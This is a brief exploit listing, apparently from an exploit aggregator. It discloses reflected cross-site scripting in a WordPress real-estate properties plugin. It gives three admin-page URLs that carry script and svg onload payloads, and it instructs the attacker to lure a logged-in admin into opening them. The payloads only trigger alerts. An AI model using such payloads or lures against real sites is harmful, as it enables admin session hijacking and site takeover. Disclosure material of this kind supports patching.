Share
## https://sploitus.com/exploit?id=WPEX-ID:C08E0F24-BD61-4E83-A555-363568CF0E6E
Make a logged in admin open one of the URLs below (some require that at least one property exist in the plugin):

https://example.com/wp-admin/edit.php?post_type=properties&"><script>alert`XSS`</script>

https://example.com/wp-admin/edit.php?post_type=properties&order="><svg/onload=alert(/XSS/)> (other affected parameter: orderby)

https://example.com/wp-admin/admin.php?page=es_demo&"><script>alert`XSS`</script>